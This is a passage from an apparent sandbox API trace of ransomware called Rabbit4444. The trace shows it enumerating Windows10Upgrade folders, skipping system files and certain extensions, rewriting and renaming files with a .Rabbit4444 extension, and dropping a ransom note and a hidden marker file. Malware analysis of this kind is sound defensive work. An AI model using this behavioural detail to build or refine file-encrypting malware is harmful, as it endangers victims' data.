hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0047.151] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0047.151] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.151] CloseHandle (hObject=0x298) returned 1 [0047.151] CloseHandle (hObject=0x278) returned 1 [0047.154] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css.Rabbit4444") returned 80 [0047.154] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\oobe-desktop.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\oobe-desktop.css.rabbit4444"), dwFlags=0x1) returned 1 [0047.154] InterlockedExchangeAdd (in: Addend=0xff618, Value=40960 | out: Addend=0xff618) returned 9248816 [0047.154] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 3010 [0047.155] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6143a6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x41b67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ui-dark.css", cAlternateFileName="")) returned 1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2="Rabbit4444.exe") returned 1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2=".") returned 1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2="..") returned 1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2="windows") returned -1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2="bootmgr") returned 1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2="pagefile.sys") returned 1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2="boot") returned 1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2="ids.txt") returned 1 [0047.155] lstrcmpiW (lpString1="ui-dark.css", lpString2="NTUSER.DAT") returned 1 [0047.155] lstrcpyW (in: lpString1=0x130eba2, lpString2="ui-dark.css" | out: lpString1="ui-dark.css") returned="ui-dark.css" [0047.155] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css", dwFileAttributes=0x0) returned 1 [0047.155] lstrlenW (lpString="ui-dark.css") returned 11 [0047.155] lstrlenW (lpString="Rabbit4444") returned 10 [0047.155] lstrcmpiW (lpString1="i-dark.css", lpString2="Rabbit4444") returned -1 [0047.155] lstrlenW (lpString=".dll") returned 4 [0047.155] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0047.155] lstrlenW (lpString=".lnk") returned 4 [0047.155] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0047.155] lstrlenW (lpString=".ini") returned 4 [0047.155] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0047.155] lstrlenW (lpString=".sys") returned 4 [0047.156] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0047.156] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\ui-dark.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.156] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.156] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13846644750) returned 1 [0047.156] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=269159) returned 1 [0047.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0047.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0047.156] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x41e70, lpName=0x0) returned 0x298 [0047.158] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41e70) returned 0x70000 [0047.166] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.166] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0047.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.166] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0047.166] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0047.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0047.166] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13847710902) returned 1 [0047.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0047.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0047.167] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.169] CloseHandle (hObject=0x298) returned 1 [0047.169] CloseHandle (hObject=0x278) returned 1 [0047.176] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css.Rabbit4444") returned 75 [0047.176] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\ui-dark.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\ui-dark.css.rabbit4444"), dwFlags=0x1) returned 1 [0047.178] InterlockedExchangeAdd (in: Addend=0xff618, Value=269168 | out: Addend=0xff618) returned 9289776 [0047.178] InterlockedExchangeAdd (in: Addend=0xff624, Value=10 | out: Addend=0xff624) returned 3014 [0047.178] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6143a6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x41b67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ui-dark.css", cAlternateFileName="")) returned 0 [0047.178] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0047.178] lstrcpyW (in: lpString1=0x130eba2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.178] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.179] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.179] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.180] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.180] CloseHandle (hObject=0x278) returned 1 [0047.180] CloseHandle (hObject=0x27c) returned 1 [0047.181] GetCurrentThreadId () returned 0xd98 [0047.181] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0047.181] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Windows10Upgrade\\resources\\ux\\EULA", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA") returned="C:\\Windows10Upgrade\\resources\\ux\\EULA" [0047.181] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10cd98 | out: hHeap=0xe0000) returned 1 [0047.181] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0047.181] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\ux\\EULA" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA") returned="C:\\Windows10Upgrade\\resources\\ux\\EULA" [0047.181] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\") returned="C:\\Windows10Upgrade\\resources\\ux\\EULA\\" [0047.181] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\ux\\EULA\\.BFC0E91B00AE8A0620D3" [0047.181] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.186] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.188] FlushFileBuffers (hFile=0x27c) returned 1 [0047.189] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.190] CloseHandle (hObject=0x27c) returned 1 [0047.190] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\ux\\EULA") returned 37 [0047.190] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.190] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3c4d9e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5717e87, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0047.190] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.190] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.191] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.191] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.191] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3c4d9e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5717e87, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.192] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.192] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.192] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.192] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.192] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.192] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5717e87, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5717e87, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe573ddc8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.192] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.192] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.192] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3c6124, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3c6124, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1af6d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_ar-sa.htm", cAlternateFileName="EULA_A~1.HTM")) returned 1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="Rabbit4444.exe") returned -1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2=".") returned 1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="..") returned 1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="windows") returned -1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="bootmgr") returned 1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="pagefile.sys") returned -1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="boot") returned 1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="ids.txt") returned -1 [0047.193] lstrcmpiW (lpString1="EULA_ar-sa.htm", lpString2="NTUSER.DAT") returned -1 [0047.193] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_ar-sa.htm" | out: lpString1="EULA_ar-sa.htm") returned="EULA_ar-sa.htm" [0047.193] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm", dwFileAttributes=0x0) returned 1 [0047.193] lstrlenW (lpString="EULA_ar-sa.htm") returned 14 [0047.193] lstrlenW (lpString="Rabbit4444") returned 10 [0047.193] lstrcmpiW (lpString1="_ar-sa.htm", lpString2="Rabbit4444") returned -1 [0047.193] lstrlenW (lpString=".dll") returned 4 [0047.193] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.193] lstrlenW (lpString=".lnk") returned 4 [0047.193] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.193] lstrlenW (lpString=".ini") returned 4 [0047.193] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.194] lstrlenW (lpString=".sys") returned 4 [0047.194] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.194] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ar-sa.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.194] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.194] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13850447769) returned 1 [0047.194] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=110445) returned 1 [0047.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0047.194] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0047.194] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1b270, lpName=0x0) returned 0x298 [0047.195] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1b270) returned 0x70000 [0047.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0047.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0047.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0047.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0047.200] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13851098976) returned 1 [0047.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0047.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0047.200] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.202] CloseHandle (hObject=0x298) returned 1 [0047.202] CloseHandle (hObject=0x278) returned 1 [0047.205] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm.Rabbit4444") returned 63 [0047.205] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ar-sa.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ar-sa.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ar-sa.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.205] InterlockedExchangeAdd (in: Addend=0xff618, Value=110448 | out: Addend=0xff618) returned 9558944 [0047.205] InterlockedExchangeAdd (in: Addend=0xff624, Value=6 | out: Addend=0xff624) returned 3024 [0047.205] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3c74ab, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3c74ab, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x3de0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_bg-bg.htm", cAlternateFileName="EULA_B~1.HTM")) returned 1 [0047.205] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.205] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.205] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="Rabbit4444.exe") returned -1 [0047.205] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2=".") returned 1 [0047.206] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="..") returned 1 [0047.206] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="windows") returned -1 [0047.206] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="bootmgr") returned 1 [0047.206] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="pagefile.sys") returned -1 [0047.206] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="boot") returned 1 [0047.206] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="ids.txt") returned -1 [0047.206] lstrcmpiW (lpString1="EULA_bg-bg.htm", lpString2="NTUSER.DAT") returned -1 [0047.206] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_bg-bg.htm" | out: lpString1="EULA_bg-bg.htm") returned="EULA_bg-bg.htm" [0047.206] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm", dwFileAttributes=0x0) returned 1 [0047.209] lstrlenW (lpString="EULA_bg-bg.htm") returned 14 [0047.209] lstrlenW (lpString="Rabbit4444") returned 10 [0047.209] lstrcmpiW (lpString1="_bg-bg.htm", lpString2="Rabbit4444") returned -1 [0047.209] lstrlenW (lpString=".dll") returned 4 [0047.209] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.209] lstrlenW (lpString=".lnk") returned 4 [0047.209] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.209] lstrlenW (lpString=".ini") returned 4 [0047.209] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.209] lstrlenW (lpString=".sys") returned 4 [0047.209] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.209] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_bg-bg.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.209] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.209] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13851991424) returned 1 [0047.209] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=253453) returned 1 [0047.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0047.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0047.209] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e110, lpName=0x0) returned 0x298 [0047.210] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e110) returned 0x70000 [0047.219] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.220] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0047.220] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.220] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0047.220] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.220] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0047.220] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.220] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0047.220] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13853069469) returned 1 [0047.220] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0047.220] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0047.220] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.222] CloseHandle (hObject=0x298) returned 1 [0047.222] CloseHandle (hObject=0x278) returned 1 [0047.228] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm.Rabbit4444") returned 63 [0047.228] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_bg-bg.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_bg-bg.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_bg-bg.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.228] InterlockedExchangeAdd (in: Addend=0xff618, Value=253456 | out: Addend=0xff618) returned 9669392 [0047.228] InterlockedExchangeAdd (in: Addend=0xff624, Value=10 | out: Addend=0xff624) returned 3030 [0047.229] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3c882e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3c882e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x14573, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_cs-cz.htm", cAlternateFileName="EULA_C~1.HTM")) returned 1 [0047.229] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.229] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.229] lstrcmpiW (lpString1="EULA_cs-cz.htm", lpString2="Rabbit4444.exe") returned -1 [0047.229] lstrcmpiW 